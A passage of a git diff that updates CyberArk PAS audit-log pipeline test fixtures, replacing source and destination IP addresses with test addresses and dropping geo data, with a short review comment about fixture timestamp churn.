Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -1124,39 +1004,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1172,7 +1031,7 @@ }, "@timestamp": "2021-03-16T10:04:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1183,17 +1042,16 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-16T10:04:49Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n 
\u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, 
@@ -1201,7 +1059,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1214,9 +1072,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615888216" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 16 03:04:49", "desc": "Use Password" 
@@ -1227,8 +1085,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349066800Z", - "original": "\u003c5\u003e1 2021-03-16T10:04:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:49\",\"IsoTimestamp\":\"2021-03-16T10:04:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374543300Z", + "original": "\u003c5\u003e1 2021-03-16T10:04:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n 
\u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:49\",\"IsoTimestamp\":\"2021-03-16T10:04:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", "action": "use password", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log index 18c5b7e67fb..a74b537c1b4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log 
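Review bot: The `event.ingested` value in this hunk changes only because the fixture was regenerated (`2021-06-09T10:24:32.349066800Z` becomes `2021-12-09T13:36:52.374543300Z`), which is pure churn that will reappear on every regeneration and buries the intended IP change in the diff; the same applies to the `ingested` lines in the `@@ -58,7 +58,7 @@`, `@@ -133,7 +133,7 @@`, `@@ -212,8 +200,8 @@` and `@@ -300,8 +276,8 @@` hunks of the 309 expected file. If the data stream's pipeline test config does not already mark it as dynamic, declaring `dynamic_fields: {event.ingested: ".*"}` there would let the comparison ignore the timestamp and keep future regenerations limited to real changes. The config file is not part of this diff, so this is a point to check rather than a confirmed gap. The enclosing `event` object closes outside the hunk.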
@@ -1,5 +1,5 @@ <7>1 2021-03-08T18:31:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:31:52","IsoTimestamp":"2021-03-08T18:31:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansr","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} <7>1 2021-03-08T18:32:03Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:03","IsoTimestamp":"2021-03-08T18:32:03Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansra","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} -<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User 
Logon","GatewayStation":""}}} -<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.32.170.205"}}} -<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"34.71.250.247"}}} +<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 
67.43.156.13\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}} +<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.13"}}} +<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User 
Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json index 79cbd597d77..c90ee6bc199 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json @@ -58,7 +58,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715271800Z", + "ingested": "2021-12-09T13:36:53.859779600Z", "original": "\u003c7\u003e1 2021-03-08T18:31:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:31:52\",\"IsoTimestamp\":\"2021-03-08T18:31:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansr\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", 
